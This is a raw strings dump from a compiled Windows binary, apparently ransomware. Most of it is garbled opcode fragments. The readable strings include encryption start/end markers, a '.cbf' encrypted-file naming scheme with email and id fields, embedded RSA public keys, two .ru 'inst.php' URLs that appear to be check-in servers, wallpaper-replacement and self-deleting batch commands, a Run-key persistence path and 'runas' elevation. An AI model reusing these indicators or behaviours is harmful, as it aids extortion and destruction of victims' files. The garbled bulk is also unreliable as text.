ZYYd
u<f
P&f
SVW
PjT
Uh.
(s^
u&j
Uh8
u#j
(Ph
@&f
 u'
@ ;E
v4j
ZYYd
 hb
ZYYd
ZYYd
ZYYd
ZYYd
ZYYd
PjT
_^[
tF3
$Tj
t.f
SVW
PjTS
Uh[
t*j
ZYYd
ZYYd
_^[
SVW
_^[
ZYYd
SVW
 ;5
C,P
@pPj
ZYYd
_^[
C(3
PP3
SVW
t"j
Uht
F P
ZYYd
@ P
F P
ZYYd
_^[
t%;C
C,^[
C,^[
t'It
SVWU
]_^[
C4=
 u,
R HP
PjT
tij
Uh7
QT3
ZYYd
SVWU
u_j
u'j
]_^[
PjTS
SVW
Bl3
ZYYd
ZYYd
_^[YY]
SVWQ
Z_^[
SVW
UhY
Uh,
(u-f
C 3
ZYYd
ZYYd
Uhv
ZYYd
ZYYd
PjT
ZYYd
ZYYd
_^[
SVW
<$BMt
d_^[
SVW
s(;~
PjTW
ZYYd
_^[
SVWU
G0(
WpRj
_^3
WpRj
T]_^[
SVW
s(;~ t8
|$ T
T_^[
SVW
C(;x
FpPj
ZYYd
_^[
SVW
B"3
ZYYd
_^[
SVW
s(;~
T_^[
SVWU
n(3
UPR
E>f
D$*Ph
;D$
T$*
;D$
D$*
T$"f
T$$f
D$&
D$(
Ep3
T$*
]_^[
SVW
s(V
C,P
Uh6
ZYYd
_^[
SVW
_^[
SVW
_^[
SVW
jjjj
_^[
t[j
F,P
SVW
Uh!
ZYYd
_^[
SVW
ZYYd
_^[
QSVW
Uh@
ZYYd
C(_^[Y]
jZS
\$4Vj
8^[
SVWjH
_^[
d=@
p=@
t=@
x=@
l=@
TPatternManagerSV
ZYYd
ZYYd
`&D
`&D
`&D
UhA
ZYYd
d=@
p=@
t=@
x=@
l=@
TJPEGData
d=@
t=@
x=@
l=@
T B
H!B
P#B
TJPEGImage
TJPEGImage
jpeg
YY]
d=@
p=@
t=@
x=@
l=@
EJPEG
ZYYd
Jl3
SVW
_^[
SVW
_^[
SVW
C +
S$3
;C$}
S$P
+D$
_^[
QSVW
ZYYd
_^[Y]
Uhw
CA3
ZYYd
SVW
ZYYd
jjj
ZYYd
ZYYd
ZYYd
ZYYd
_^[
SVW
_^[
SVW
;F(
_^[
C,[
|lF3
|=F3
SVWU
tYj
|5G3
]_^[
SVW
@,3
jjj
Uhn
X,3
Q43
@,3
@,3
@,3
ZYYd
@"Pj
ZYYd
ZYYd
_^[
SVWU
u6j
s8Wj
]_^[
R [
C4[
R,[
C0[
SVW
S\_^[]
C,[
SVWQ
Z_^[
SVW
BA3
ZYYd
_^[
QSVW
S`_^[Y]
UhF#B
ZYYd
hM#B
SVW
;w8tF
R$;
_^[
ZYYd
SVWQ
Z_^[
SVj
_^[
C$Ht
K83
KT3
Kh3
Cl^[
r-t
?(B
1(B
*(B
;Sts
SVWU
;+D$
JL3
]_^[
SVWU
OL3
Z]_^[
FD_^[Y]
FH_^[Y]
SVW
MP3
MP3
Z]_^[
SVW
S0QW
_^[
SVW
S0QW
_^[
SVW
vs;E
_^[
SVW
vv;E
_^[
SVW
FL+
FL+
YZ_^[
SVW
X+B
,,B
x-B
C$\3B
C(h4B
C83
CLT
_^[
T;{$|
F,3
NLG
T;{$|
;K$|
_^[
VWQ
AH3
A@3
AD3
Z_^[
SVWU
YZ]_^[
rwt
Ht4
_^[
S R
S 3
K$^[
SVW
_^[
<;B
H;B
]_^[
;Str
_^[
VWQ
;Ktr
$Z_^[
VWU
;Ktr
]_^[
;Jxu
;K4w/
;K4w,
;K4w,
F$G
T;{$|
F,G
T;{$|
K,It
_^[
@B=
@B=
Cd3
Sh3
Kh3
Cl3
t43
,EB
DLB
]_^[
SVWU
l$4
T$$
L$(
$VW
|$@
_^3
T$ 
L$ 
}1j
D$(
|$,
t$0
+t$
D$,
|$,
t$0
tQ;
~!S
D$(
|$,
t$0+
D$ 
;T$
T$$
L$(
t$8
L]_^[
SVWU
T$0
T$ 
L$$
;L$
}.j
D$$
l$(
\$,
D$(
l$(
\$,
~!W
D$$
l$(
\$,+
t3;
D$$
l$(
\$,+
;T$
T$ 
L$$
4]_^[
\$ 
$_^[
SVWU
L$D
T$4
L$8
T$$
L$(
L$(
D$0
L$,
;D$
}+j
D$8
t$<
\$@
T$$
T$$
D$$PU
D$<
t$<
\$@
tUOt
D$8
t$<
\$@K
D$8
t$<
\$@+
T$,
D$ 
T$ f
D$8
t$<
\$@K
T$ f
#T$
u$f
L$ f
T$ f
D$,
;D$
T$,
L$0
D$(
D$0
D$,
;D$
;T$
D$ 
T$ f
D$8
t$<
\$@K
T$ f
#T$
L$ f
T$ f
;D$
T$4
L$8
T$(
|$(
L$(
|$(
]_^[
@GB
A;K$|
;T$
_^[
tF3
SVW
~)W
}'j
_^[
SVWU
L$<
T$,
L$0
|$H
_^3
L$(
T$$
L$ 
D$ 
L$$
T$$
}.j
D$0
|$4
\$8
D$4
|$4
\$8
tQ;
~!V
D$0
|$4
\$8+
D$$
L$(
L$$
}1j
D$0
|$4
\$8
+\$
D$4
|$4
\$8
~!V
D$0
|$4
\$8+
}1j
D$0
|$4
\$8
+\$
T$ R
D$4
|$4
\$8
~!V
D$0
|$4
\$8+
D$(
D$$
D$ 
;T$
T$,
t$@
L$0
P]_^[
hTB
P[B
_^[
t(j
C(P
C 3
C,;
1)s,
QSV
^[Y]
SVW
_^[
SVW
_^[
(cB
xaB
_^[
_^[
SVW
_^[
SVW
_^[
@pP
QSVW
GF;}
_^[Y]
SVW
_^[
C(Ht
K,It
Ite
0;C$|
0hB
xhB
K,;K(u
K|^[
SVW
;L$
A;L$
;D$
;L$
;L$
;L$
;D$
;L$
_^[
SVWU
PxR
D$,
L$ 
D$ 
T$,
L$(
;D$
D$(
T$$;L$
}&3
T$$;
;L$
;D$
D$,
D$ 
Jx;L$
0]_^[
SVW
HFP
$;xx
 _^[
SVWU
]_^[
SVW
;8u
$;Zx|
YZ_^[
SVW
v53
_^[
SVW
v03
_^[
SVW
v$3
_^[
SVW
vW3
_^[
WUQ
;{x|
Z]_^[
VWU
t&ItZ
<sB
0rB
TtB
;{x|
]_^[
PvB
(wB
,wB
SVW3
_^[
SVW3
_^[
SVW
;D$
D$$;T$
D$$
L$ ;\$
D$ 
C;\$
D$$
;T$
;L$
L$,;T$
D$,
L$(;\$
D$(
C;\$
D$,
;T$
;L$
;\$
L$0;T$
D$0
D$0
;T$
C;\$
;T$
;\$
L$4;T$
D$4
D$4
;T$
K;\$
;t$
L$8;T$
L$8
;\$
@;\$
D$8
;T$
;t$
;D$
L$<;T$
L$<
;\$
@;\$
D$<
;T$
H;D$
+D$
+T$
+L$
D$D;T$
D$D
L$@;\$
D$@
C;\$
D$D
;T$
H_^[
It,
F;u
SVWU
L$ 3
L$$
D$,;L$
D$,
T$(;\$
D$(
|Cf
l$ 
l$$B;
C;\$
D$,
;L$
D$ 
D$$
0]_^[
SVW
]_^[
8;]
D;]
!;]
F;]
#;]
SVW
;1}
_^[
SVW
1Ff
_^[
vY3
SVW
_^[
SVW
0}%
_^[
WUQ
t!3
Z]_^[
VWU
]_^[
q<3
T;s$|
_^[
SVWU
|$ 
l$ 
D$ 
P$;T$
$]_^[
SVWU
P$;T$
]_^[
SVWU
P$;T$
]_^[
Jt>
C@3
KD3
K4[
C4;E
K4_^[YY]
SVW
rMtsJ
CHP
C4;CH
CL;
SHR
C4;CHr3
_^[YY]
$;F$|
]_^[
SVW
T$$
;T$
D$$
T$8
L$8
T$4
;L$
D$(
T$$
D$,
L$03
D$ 
;L$
D$$
D$ ;CH}4
|$03
;t$(}(
D$,PW
T$ 
T$<
{$F;t$(|
T$,
D$ 
L$ ;K8|
D$8
;T$
;L$
D$$
;D$$
<_^[
SVW
t$(
T$ 
;T$
T$(
T$$
D$$
T$ 
D$ 
;O4|
;p8|
D$$
;L$
;L$
;D$
8_^[
SVW
D$$
T$ 
D$(
;T$
T$$
L$(
;D$
T$(3
T$$
D$(
;T$
D$ 
D$$
A$;D$
,_^[
SVW
sp3
t#f
$;X$
_^[
L$@
D$@
;L$
D$@
T$ 
L$ 
L$$3
D$L
T$@
T$@
T$ 
|$ 
D$@
D$ 
T$ 
T$$
D$L
D$@
T$$
L$$Qj
T$H
T$ 
D$(
D$@
T$(3
L$H
D$$Pj
L$ 
D$(
D$H
T$P
D$@
T$T
L$T
D$X
T$T
L$\
D$T
T$d
L$T
D$l
T$T
L$h
D$T
T$`
L$D
L$8
T$(
;D$ 
L$,
|$H
D$,
D$0
L$0
|$L
D$ H;D$
T$,
T$4
D$4
T$0
L$x
L$t
L$p
D$,
T$|
D$4
D$<3
L$@
;L$
D$,
;D$
T$0
L$x
D$,
L$4
T$P
L$X
D$\
T$\
D$\
T$\
T$P
D$t+
l$X
D$d
T$d
D$d
T$d
T$P
D$t
T$|
l$X
D$l
T$l
D$l
T$l
T$P
D$p+D$x+
l$X
D$h
T$h
D$h
T$h
T$P
D$|
t$X
D$`
T$`
D$`
T$`
T$8R
D$@P
T$H
T$L
T$t
T$p
L$x
L$t
t$|
D$|
D$,
D$0
D$4
D$@
T$<
;L$
D$@
T$8
;L$ 
D$@T
P$;T$
SVW
G$;
]_^[
Jt\Jt;
SVW
v(+E
_^[
QSVW
@t+C
_^[Y]
nxP
Z_^[
SVWU
D$ 
A$Ht
JHIt
L$ 
L$ 
A(;D$
D$ 
t-Itk
PP3
PP3
T$$
t$$
D$$
PP3
D$(h
T$(
l$,
D$,@G
D$(
D$ 
A$;D$
0]_^[
CPh
CPP
$;V$|
Z]_^[
C\;
|d3
;N$|
C\+
S`;U
)K`
C\;
_^[
SVW
JpQ
_^[
@Pj
ApP
SVW
v*3
_^[
SVW
B(A
_^[
VWU
;l$
;L$
;T$
u+;L$
;D$
;T$
;C$
]_^[
SVW
RPf
uzf
usf
ulf
uef
u^f
uWf
_^[
?u='
SVW
uef
u^f
uWf
uPf
uIf
uBf
_^[
SVW
u?f
u8f
u1f
u*f
u#f
_^[
SVW
u+f
u$f
_`i
_^[
C(3
SVWU
2O3
2O3
C u!
2O3
C F
2O3
2O3
;C$
]_^[
SVWU
:M3
$;L$
:M3
T;C$|
$;D$
:M3
]_^[
SVWU
$u!
L$ 
T$!
L$"
T$#
L$$
T$%
L$&
T$'
L$(
D$,
;l$
;l$
D$0P
]_^[
SVWU
$u!
2O3
2O3
2O3
2O3
|m3
,$A
,$@
]_^[
SVWU
YZ]_^[
QSVW
_^[Y]
eu|3
SVWU
;D$
;T$
+L$
 ]_^[
SVWU
2K3
;|$
;|$
EKG;|$
;|$
+T$
]_^[
SVW
Z]_^[
SVWUQ
+CN
+CN
+CN
Z]_^[
SVWU
YZ]_^[
ua3
uM3
Ot.
]_^[
J`3
XDA
K`^[
QSVW
QPR
_^[Y]
QPR
Q$K
R(3
_^[
SVW
PVj
_^[
_^[
_^[Y]
SVW
_^[
QSVW
_^[Y]
s<3
C@3
C@3
C@3
C@3
C@3
C@3
C@3
C@3
C@3
C@3
C@3
B;S8|
SVW
_^[]
^[]
~8t
$}-
j?j
j?j
j?j
j?j
j?j
j?j
j?j
j?j
j?j
j?j
Z_^[
VWQ
;K r
C +
$Z_^[
VWU
;K r
]_^[
C@3
ST3
_^[
SV3
fu'
;S s
gts
_^[]
_^[
SVWU
]_^[
SVWU
]_^[
SVW
T;{8|
_^[
SVWU
]_^[
SVW
_^[
SVWUQ
T;{8|
T;{8|
Z]_^[
WUQ
7t1
u:3
Z]_^[
SVW
u23
_^[
T;{8|
F,G
T;{8|
_^[
SVW
?t6
\$H3
;F8|
D$ 
;N8|
;D$
;^8|
;L$
@}(
;L$
;L$
D$H
;|$
#;+u
;L$
;|$
;D$
;D$
;L$
t53
\$H
;N8|
\$ 
;N8|
]_^[
VWU
;C8|
]_^[
VWQ
AH3
Q<3
AD3
Z_^[
I;N
It 
_^[
u-3
SVW
_^[YY]
$;C8|
Z]_^[
N 3
K03
K<^[
QSVW
C;]
_^[Y]
SVW
+N4+
F4P
N4)F0
F4;
}43
;{8|
V4;
T;{8|
_^[
SVW
+K4+
C4P
P ;S0uP3
P8;U
S4)C0
K4;K<}53
C<P
P8;U
C4;C<uV
C8;E
K4;M
_^[
SVWU
P8;T$
]_^[
SVWUQ
$;C8|
Z]_^[
I;J
OtAOt 
_^[
SVW
T$ 
;D$
T$0
L$0
;D$
T$$
D$,
L$ 
L$(3
;T$
L$ 
;KH}x
L$,Q
D$4P
T$0R
C4;D$$~u
T$$
+T$$
D$$
;C4|
9;C4|
D$(
;S8
D$0
;D$
T$ 
;T$
D$ 
;D$ 
4_^[
SVW
D$(
L$@
T$4
L$(
D$<
D$,
;T$
L$(
D$$
T$(
T$(
T$$
|$$
L$$
D$(3
D$(
T$ 
L$@
D$<
T$,
L$8
D$ ;D$$
T$8
L$0
D$0P
T$$
D$L
T$8
D$0
D$0
T$03
T$0~
D$ 
D$8
D$ ;D$$
;D$
L$$
L$ 
D$,
T$ 
L$D
D$D
T$0
L$D
D$0
;D$
T$0~
D$0
;L$
D$ 
D$D
D$(
;T$ 
D$4
D$@
D$(T
A8;D$
H_^[
SVW
t$(
T$ 
;T$
T$(
T$$
D$$
T$ 
D$ 
;O4|
;p8|
D$$
;L$
;L$
;D$
8_^[
tS3
F8;D$
P@YZ]_^[
Z^[
SVW
_^[
SVW
s@3
A;U
_^[
SVW
_^[
SVW
_^[YY]
SVW
_^[
C(Ht
K<;K(u
C8;C$t
~)3
;F8|
_^[
sR3
@B;U
C;]
QSVW
_^[Y]
SVW
B;u
_^[
SVW
_^[
SVW
_^[
vV3
SVWU
T;k8
YZ]_^[
SVW
Itg
D$ 
D$ 
|$$
D$$
D$ 
A8;D$
(_^[
SVW
_^[
SVW
_^[
FSV
8"C
SVWU
()C
|+C
;L$
S<3
]_^[
VWU
]_^[
SVW
_^[
vT3
C<^[
K ;
S<^[
SVW
$+D
;D$
_^[
SVWU
;T$
;D$
]_^[
WUQ
Z]_^[
SVWU
;L$
;L$
k<3
;D$
u/G
k@3
;D$
k@3
;D$
]_^[
SVWU
]_^[
D$C
AL3
A@^[
SVWU
+\$
<1+
P@+
+\$
<1+
]_^[
\$ 
\$,
\$$
\$(
D$ 
D$$
D$ 
d$$
D$(
D$,
\$0
D$,
D$0
D$,
d$0
\$ 
\$$
\$(
D$ 
d$(
\$@
L$ 
D$@
\$4
L$(
D$@
\$<
D$$
\$8
D$8
\$D
d$8
\$H
D$H
D$4
D$H
d$4
D$D
D$<
D$D
d$<
\$ 
\$,
\$$
\$(
D$ 
D$$
D$ 
d$$
D$(
D$,
\$0
D$,
D$0
D$,
d$0
\$ 
\$$
\$(
D$ 
d$(
\$@
L$ 
D$@
\$4
L$(
D$@
\$<
D$$
\$8
D$8
\$D
d$8
\$H
D$H
D$4
D$H
d$4
D$D
D$<
D$D
d$<
?u=
?SVWU
4@C
@;C
P<C
<R3
]_^[
SVW
_^[
VWU
]_^[
SVW
_^[
K ;
t$(
,]_^[
\$ 
$_^[
SVW
_^[
SVWU
u 3
K$3
;L$
]_^[
SVW
$j!j
T$8R
t$0
t$,
T$0;
GF@
_^[
SVWU
L$$Q
,]_^[
ZYYd
,BC
<BC
ZYYd
YY]
jpeg
jpg
UhuBC
ZYYd
h|BC
h DC
h0DC
h<DC
hHDC
hdDC
htDC
 )D
$)D
()D
,)D
0)D
4)D
8)D
<)D
@)D
kernel32.dll
CreateToolhelp32Snapshot
Heap32ListFirst
Heap32ListNext
Heap32First
Heap32Next
Toolhelp32ReadProcessMemory
Process32First
Process32Next
Process32FirstW
Process32NextW
Thread32First
Thread32Next
Module32First
Module32Next
Module32FirstW
Module32NextW
 )D
ZYYd
D)D
ZYYd
-D)D
PFC
PFC
lq@
d=@
p=@
t=@
x=@
l=@
ERegistryException
d=@
p=@
t=@
x=@
l=@
TRegistry
*GC
dFC
d=@
p=@
t=@
x=@
l=@
TRegIniFile
;\u
SVW
_^[
SVW
_^[
SVW3
jjj
ZYYd
_^[
SV3
jjj
ZYYd
SVW
@Pj
_^[
SVW
PVj
_^[
SV3
ZYYd
^[YY]
SVW
_^[]
t{3
Uh MC
ZYYd
ZYYd
h'MC
H)D
ZYYd
-H)D
L)D
ZYYd
-L)D
UhwPC
ZYYd
h~PC
^[YY]
SVW
LTA
LTA
Uh']C
RP3
=0u
h$^C
h0^C
h$^C
h<^C
h<^C
h<^C
h<^C
h0^C
=0u
h$^C
h0^C
H^C
5X^C
h$^C
h<^C
h0^C
h$^C
h0^C
d^C
RP3
|/D
RP3
RP3
h$^C
h<^C
h0^C
h$^C
h0^C
d^C
RP3
|/D
RP3
p^C
h$^C
5|3D
RP3
ZYYd
ZYYd
ZYYd
LTA
_^[
{ENCRYPTENDED}
{ENCRYPTSTART}
{BLOCKSSTART}
{BLOCKSEND}
}{ENCRYPTENDED}
email-
.ver-
.id-
.randomname-
.cbf
SV3
LTA
LTA
h8bC
h8bC
h8bC
DbC
LcC
XcC
XcC
dcC
xcC
d)D
d)D
CNu
ZYYd
h%bC
LTA
JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
|||
THISISPFILE
QSVW
LTA
LTA
LTA
LTA
LTA
LTA
LTA
LTA
LTA
LTA
LTA
P)D
T)D
X)D
h)D
h)D
h)D
X)D
T)D
ZYYd
LTA
_^[
65537
12345678900987654321
\)D
`)D
h)D
Phl/D
ht/D
X)D
P)D
ZYYd
SVW3
Lq@
UhRjC
hjC
d)D
tjC
d)D
ZYYd
ZYYd
hYjC
Lq@
_^[
*.*
BCDLID
SVW
\)D
l)D
d)D
 rC
 rC
 rC
,rC
,rC
,rC
8rC
8rC
8rC
DrC
DrC
DrC
d)D
PrC
`rC
d)D
`rC
ZYYd
_^[
BCDLID
noneend
SVW3
Uh2sC
jjjj
h@sC
jjjj
ZYYd
ZYYd
h9sC
_^[
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
QQQQQQQSVW3
UhqwC
lxC
tf3
UhptC
hxxC
5`)D
5\)D
ZYYd
lxC
tf3
Uh%uC
hxxC
5`)D
5\)D
ZYYd
lxC
tf3
hxxC
5`)D
5\)D
ZYYd
TzC
lxC
tf3
hxxC
5`)D
5\)D
ZYYd
({C
lxC
tf3
UhDwC
hxxC
5`)D
5\)D
ZYYd
ZYYd
hxwC
_^[
GOOD
http://shopping-na-divane.ru/system/logs/tool/inst.php|||22222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222222
|||
?vers=
&id=
&sender=
http://shoptorgvlg.ru/system/logs/tool/inst.php|||333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333333
44444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444
55555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555
66666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666666
@?d
QP3
ZYYd
ZYYd
ZYYd
.bmp
Ph }C
`&D
RT_RCData
SVW3
ZYYd
_^[
QSV
Uh4
ZYYd
^[Y]
Control Panel\Desktop
Wallpaper
TileWallpaper
SVW3
Uh+
\)D
\)D
Cjj
Uhd
ZYYd
jjj
ZYYd
ZYYd
_^[
ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ
explorer.exe
explorer.exe
desk.jpg
DESK
desk.bmp
desk1.bmp
.bat
chcp 1251 > nul 
rep:
del "
if exist "
" goto rep
.bat"
open
QSVW
Lq@
Uh9
d)D
=h/D
5h/D
@,D
ZYYd
d)D
d)D
d)D
ZYYd
Lq@
_^[
*.*
log.log
Error in file 
SVQh
t T
@Z^[
IsWow64Process
Kernel32.dll
SVW
jjjjjj
j j
| C3
GKu
_^[
SVW
_^[
Windows 95
Windows 98
Windows Me
Windows NT 3.51
Windows NT 4.0
Windows 2000
Windows XP
Windows Vista
Windows 7
Windows 8
Windows 8.1
Windows Server
ZYYd
runas
SVW3
Uh:
h<+D
d)D
<+D
d)D
d)D
d)D
\u!hd)D
d)D
d)D
d)D
d)D
d)D
5d)D
d)D
d)D
d)D
dFC
d)D
ZYYd
UhG
dFC
d)D
ZYYd
d)D
d)D
d)D
d)D
UhH
dFC
d)D
ZYYd
dFC
d)D
ZYYd
ZYYd
_^[
:\Program Files
x64
x32
(x86)
 (x86)
|||00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
|||
open
Windows XP
software\microsoft\windows\currentversion\run
runas
SVW
UhQ
7hl
ds8
7hx
7hl
ds8
7hx
7hl
ds8
7hx
7hl
ds8
7hx
7hl
ds8
7hx
ZYYd
_^[
LTA
LTA
P)D
X)D
h)D
\)D
ZYYd
LTA
asshole
|3D
t/D
LTA
l/D
LTA
@,D
l)D
h)D
d)D
`)D
\)D
X)D
T)D
P)D
ZYYd
Xf@
4q@
DGA
|SA
$TA
PAC
PBC
dEC
HMC
QSVW
h/D
p)D
<+D
|3D
h|3D
|3D
|3D
<,D
`)D
\)D
T)D
T)D
T)D
l/D
T)D
T)D
t/D
|/D
\)D
`/D
h`/D
`/D
`/D
<,D
`/D
`/D
h`/D
`/D
`/D
`/D
`/D
d/D
hd/D
d/D
d/D
<,D
d/D
d/D
hd/D
d/D
d/D
d/D
d/D
l)D
d)D
\)D
ZYYd
_^[
vipasana{}{}{}BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
{}{}{}
82185735584238685767632861624177274887293565538741444362435583850820132920183142699990513211431218351515869551667585525921751268860153332622085268097015158687030691773886056780852269841267506558244411
03484117901192362044107373706299647832760503989379610949620903289961076922047235709569442148351776390771045819406380727053579573045429371687056037657759416374532634792426441798055715624726414878656648
97932057208863804097317380182557626120092371160971366025152017122881832224591456521412041436352424715545408606242333615724802894715060374899930748348693104568782083465816005355018530243731351021765414
1746100718072807:65537|||13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G13G1
G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G14G1
G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G15G1
G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G16G1
G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G17G1
G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G18G1
G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G19G1
G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110G110
G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111G111
G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112G112
G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113G113
G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114G114
G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115G115
G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116G116
G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117G117
G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118G118
G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119G119
G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120G120
|||
43720500143653067316653188766440495762372951459803254704332449380648781636144602657723600306416673181918633158563712416544618578249307294895202624079580191874460024499933472381883027218220456554995247
65158281214745718421265965989442504562394836294548216033955590900254939392369170497228950606445248805833582659669548453902496538789520516235779898350051755771122652473634583693017585978107350613046507
46286697306922310714255768031863446183870422616732285912784282786501377105470022873925357301968061494307039417299358802372691417937010589796477887985234705396188080181574217253421725831596987526612984
119150272153433:65537|||G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G23G2
G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G24G2
G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G25G2
G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G26G2
G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G27G2
G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G28G2
